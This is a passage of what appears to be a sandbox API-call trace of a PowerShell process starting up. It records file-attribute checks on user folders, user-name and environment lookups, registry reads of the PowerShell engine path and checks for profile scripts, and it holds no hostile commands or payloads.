	[0062.431] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x350027a5a0 | out: lpFileInformation=0x350027a5a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x1f6119c0, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x730fc777, ftLastAccessTime.dwHighDateTime=0x1d40d90, ftLastWriteTime.dwLowDateTime=0x730fc777, ftLastWriteTime.dwHighDateTime=0x1d40d90, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0062.431] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.431] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x105, lpBuffer=0x350027a340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0062.431] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.431] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x350027a5a0 | out: lpFileInformation=0x350027a5a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x1f6119c0, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x730fc777, ftLastAccessTime.dwHighDateTime=0x1d40d90, ftLastWriteTime.dwLowDateTime=0x730fc777, ftLastWriteTime.dwHighDateTime=0x1d40d90, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0062.431] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.431] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8410
	[0062.431] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.431] CoTaskMemFree (pv=0x233e39e8410) 
	[0062.435] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x105, lpBuffer=0x350027a4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0062.435] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x350027a350, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0062.435] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.435] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x350027a560 | out: lpFileInformation=0x350027a560*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x31b3b9e4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x95a116d6, ftLastAccessTime.dwHighDateTime=0x1d3a57f, ftLastWriteTime.dwLowDateTime=0x95a116d6, ftLastWriteTime.dwHighDateTime=0x1d3a57f, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0062.436] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.436] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x350027a350, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0062.436] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.436] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x350027a560 | out: lpFileInformation=0x350027a560*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x31b3b9e4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x95a116d6, ftLastAccessTime.dwHighDateTime=0x1d3a57f, ftLastWriteTime.dwLowDateTime=0x95a116d6, ftLastWriteTime.dwHighDateTime=0x1d3a57f, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0062.436] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.436] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x350027a360, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0062.436] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.436] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x350027a560 | out: lpFileInformation=0x350027a560*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x1f5eb76f, ftLastAccessTime.dwHighDateTime=0x1d30b90, ftLastWriteTime.dwLowDateTime=0x1f5eb76f, ftLastWriteTime.dwHighDateTime=0x1d30b90, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0062.436] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.436] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x350027a350, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0062.436] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.436] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x350027a560 | out: lpFileInformation=0x350027a560*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x1f5eb76f, ftLastAccessTime.dwHighDateTime=0x1d30b90, ftLastWriteTime.dwLowDateTime=0x1f5eb76f, ftLastWriteTime.dwHighDateTime=0x1d30b90, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0062.436] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.436] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x350027a360, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0062.437] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.437] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi" (normalized: "c:\\users\\nd9e1fyi"), fInfoLevelId=0x0, lpFileInformation=0x350027a560 | out: lpFileInformation=0x350027a560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f5eb76f, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x78452c50, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x78452c50, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0062.437] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.437] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi", nBufferLength=0x105, lpBuffer=0x350027a350, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi", lpFilePart=0x0) returned 0x11
	[0062.437] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.437] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi" (normalized: "c:\\users\\nd9e1fyi"), fInfoLevelId=0x0, lpFileInformation=0x350027a560 | out: lpFileInformation=0x350027a560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f5eb76f, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x78452c50, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x78452c50, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0062.437] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.437] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi", nBufferLength=0x105, lpBuffer=0x350027a360, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi", lpFilePart=0x0) returned 0x11
	[0062.437] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.437] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x350027a560 | out: lpFileInformation=0x350027a560*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x1f6119c0, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x730fc777, ftLastAccessTime.dwHighDateTime=0x1d40d90, ftLastWriteTime.dwLowDateTime=0x730fc777, ftLastWriteTime.dwHighDateTime=0x1d40d90, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0062.437] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.437] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x105, lpBuffer=0x350027a350, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0062.437] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.437] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x350027a560 | out: lpFileInformation=0x350027a560*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x1f6119c0, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x730fc777, ftLastAccessTime.dwHighDateTime=0x1d40d90, ftLastWriteTime.dwLowDateTime=0x730fc777, ftLastWriteTime.dwHighDateTime=0x1d40d90, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0062.438] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.438] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x105, lpBuffer=0x350027a360, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0062.438] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.438] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x350027a5a0 | out: lpFileInformation=0x350027a5a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x1f5eb76f, ftLastAccessTime.dwHighDateTime=0x1d30b90, ftLastWriteTime.dwLowDateTime=0x1f5eb76f, ftLastWriteTime.dwHighDateTime=0x1d30b90, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0062.438] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.438] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x350027a390, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0062.438] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.438] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x350027a5a0 | out: lpFileInformation=0x350027a5a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x1f5eb76f, ftLastAccessTime.dwHighDateTime=0x1d30b90, ftLastWriteTime.dwLowDateTime=0x1f5eb76f, ftLastWriteTime.dwHighDateTime=0x1d30b90, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0062.438] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.438] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x350027a3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0062.439] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.439] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi" (normalized: "c:\\users\\nd9e1fyi"), fInfoLevelId=0x0, lpFileInformation=0x350027a5a0 | out: lpFileInformation=0x350027a5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f5eb76f, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x78452c50, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x78452c50, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0062.439] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.439] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi", nBufferLength=0x105, lpBuffer=0x350027a390, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi", lpFilePart=0x0) returned 0x11
	[0062.439] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.439] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi" (normalized: "c:\\users\\nd9e1fyi"), fInfoLevelId=0x0, lpFileInformation=0x350027a5a0 | out: lpFileInformation=0x350027a5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f5eb76f, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x78452c50, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x78452c50, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0062.439] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.439] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi", nBufferLength=0x105, lpBuffer=0x350027a3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi", lpFilePart=0x0) returned 0x11
	[0062.439] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.439] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x350027a5a0 | out: lpFileInformation=0x350027a5a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x1f6119c0, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x730fc777, ftLastAccessTime.dwHighDateTime=0x1d40d90, ftLastWriteTime.dwLowDateTime=0x730fc777, ftLastWriteTime.dwHighDateTime=0x1d40d90, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0062.439] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.439] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x105, lpBuffer=0x350027a390, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0062.439] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.439] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x350027a5a0 | out: lpFileInformation=0x350027a5a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x1f6119c0, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x730fc777, ftLastAccessTime.dwHighDateTime=0x1d40d90, ftLastWriteTime.dwLowDateTime=0x730fc777, ftLastWriteTime.dwHighDateTime=0x1d40d90, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0062.439] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.440] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x105, lpBuffer=0x350027a3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0062.441] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x105, lpBuffer=0x350027a600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x0) returned 0x19
	[0062.441] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.441] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x350027a860 | out: lpFileInformation=0x350027a860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x1f6119c0, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x730fc777, ftLastAccessTime.dwHighDateTime=0x1d40d90, ftLastWriteTime.dwLowDateTime=0x730fc777, ftLastWriteTime.dwHighDateTime=0x1d40d90, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0062.441] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.443] CoTaskMemAlloc (cb=0x804) returned 0x233fc6390a0
	[0062.443] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x233fc6390a0, nSize=0x350027abc8 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x350027abc8) returned 0x1
	[0062.444] CoTaskMemFree (pv=0x233fc6390a0) 
	[0062.444] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0062.444] GetUserNameW (in: lpBuffer=0x233e12d9b70, pcbBuffer=0x350027ac08 | out: lpBuffer="Nd9E1FYi", pcbBuffer=0x350027ac08) returned 1
	[0062.444] CoTaskMemFree (pv=0x233e12d9b70) 
	[0062.445] ReportEventW (hEventLog=0x233e3810018, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x233e44071d0*="Available", lpRawData=0x233e4406f60) returned 1
	[0062.446] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8630
	[0062.446] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.446] CoTaskMemFree (pv=0x233e39e8630) 
	[0062.447] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8da0
	[0062.447] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.447] CoTaskMemFree (pv=0x233e39e8da0) 
	[0062.450] CoTaskMemAlloc (cb=0x104) returned 0x233e39e7a80
	[0062.450] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x233e39e7a80, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0062.450] CoTaskMemFree (pv=0x233e39e7a80) 
	[0062.450] CoTaskMemAlloc (cb=0x104) returned 0x233e39e91e0
	[0062.450] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x233e39e91e0, nSize=0x80 | out: lpBuffer="\\Users\\Nd9E1FYi") returned 0xf
	[0062.451] CoTaskMemFree (pv=0x233e39e91e0) 
	[0062.453] GetCurrentProcessId () returned 0xd94
	[0062.456] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027abe8 | out: phkResult=0x350027abe8*=0x690) returned 0x0
	[0062.456] RegQueryValueExW (in: hKey=0x690, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x350027ab6c, lpData=0x0, lpcbData=0x350027ab68*=0x0 | out: lpType=0x350027ab6c*=0x1, lpData=0x0, lpcbData=0x350027ab68*=0x56) returned 0x0
	[0062.456] CoTaskMemAlloc (cb=0x5a) returned 0x233e3a07b50
	[0062.456] RegQueryValueExW (in: hKey=0x690, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x350027ab3c, lpData=0x233e3a07b50, lpcbData=0x350027ab38*=0x56 | out: lpType=0x350027ab3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x350027ab38*=0x56) returned 0x0
	[0062.456] CoTaskMemFree (pv=0x233e3a07b50) 
	[0062.456] RegCloseKey (hKey=0x690) returned 0x0
	[0062.457] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8b80
	[0062.457] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8b80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.457] CoTaskMemFree (pv=0x233e39e8b80) 
	[0062.458] CoCreateGuid (in: pguid=0x350027afb0 | out: pguid=0x350027afb0*(Data1=0x54cc4947, Data2=0x6e07, Data3=0x4d7c, Data4=([0]=0x9e, [1]=0x83, [2]=0x87, [3]=0xc8, [4]=0xfa, [5]=0x80, [6]=0xe1, [7]=0x3b))) returned 0x0
	[0062.554] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027ad98 | out: phkResult=0x350027ad98*=0x690) returned 0x0
	[0062.554] RegQueryValueExW (in: hKey=0x690, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x350027ad1c, lpData=0x0, lpcbData=0x350027ad18*=0x0 | out: lpType=0x350027ad1c*=0x1, lpData=0x0, lpcbData=0x350027ad18*=0x56) returned 0x0
	[0062.554] CoTaskMemAlloc (cb=0x5a) returned 0x233e3a073e0
	[0062.554] RegQueryValueExW (in: hKey=0x690, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x350027acec, lpData=0x233e3a073e0, lpcbData=0x350027ace8*=0x56 | out: lpType=0x350027acec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x350027ace8*=0x56) returned 0x0
	[0062.554] CoTaskMemFree (pv=0x233e3a073e0) 
	[0062.555] RegCloseKey (hKey=0x690) returned 0x0
	[0062.555] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027ad98 | out: phkResult=0x350027ad98*=0x690) returned 0x0
	[0062.555] RegQueryValueExW (in: hKey=0x690, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x350027ad1c, lpData=0x0, lpcbData=0x350027ad18*=0x0 | out: lpType=0x350027ad1c*=0x1, lpData=0x0, lpcbData=0x350027ad18*=0x56) returned 0x0
	[0062.555] CoTaskMemAlloc (cb=0x5a) returned 0x233e3a08410
	[0062.555] RegQueryValueExW (in: hKey=0x690, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x350027acec, lpData=0x233e3a08410, lpcbData=0x350027ace8*=0x56 | out: lpType=0x350027acec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x350027ace8*=0x56) returned 0x0
	[0062.555] CoTaskMemFree (pv=0x233e3a08410) 
	[0062.555] RegCloseKey (hKey=0x690) returned 0x0
	[0062.556] CoTaskMemAlloc (cb=0x20c) returned 0x233e39fbb20
	[0062.556] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x233e39fbb20 | out: pszPath="C:\\Users\\Nd9E1FYi\\Documents") returned 0x0
	[0062.556] CoTaskMemFree (pv=0x233e39fbb20) 
	[0062.556] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents", nBufferLength=0x105, lpBuffer=0x350027a910, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents", lpFilePart=0x0) returned 0x1b
	[0062.556] CoTaskMemAlloc (cb=0x20c) returned 0x233e39f94e0
	[0062.556] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x233e39f94e0 | out: pszPath="C:\\Users\\Nd9E1FYi\\Documents") returned 0x0
	[0062.556] CoTaskMemFree (pv=0x233e39f94e0) 
	[0062.556] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents", nBufferLength=0x105, lpBuffer=0x350027a910, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents", lpFilePart=0x0) returned 0x1b
	[0062.582] CoTaskMemAlloc (cb=0x104) returned 0x233e39e9840
	[0062.582] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e9840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.582] CoTaskMemFree (pv=0x233e39e9840) 
	[0062.584] CoTaskMemAlloc (cb=0x104) returned 0x233e39e9840
	[0062.584] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e9840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.584] CoTaskMemFree (pv=0x233e39e9840) 
	[0062.586] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.586] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x350027acc0 | out: lpFileInformation=0x350027acc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0062.586] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x350027aab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShell_profile.ps1", lpFilePart=0x0) returned 0x41
	[0062.587] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.587] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x350027acc0 | out: lpFileInformation=0x350027acc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0062.587] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.587] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x350027aab0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x39
	[0062.587] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.587] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\nd9e1fyi\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x350027acc0 | out: lpFileInformation=0x350027acc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0062.587] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.587] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x350027aab0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\PowerShell_profile.ps1", lpFilePart=0x0) returned 0x44
	[0062.587] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.587] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\PowerShell_profile.ps1" (normalized: "c:\\users\\nd9e1fyi\\documents\\windowspowershell\\powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x350027acc0 | out: lpFileInformation=0x350027acc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0062.587] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.589] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8630
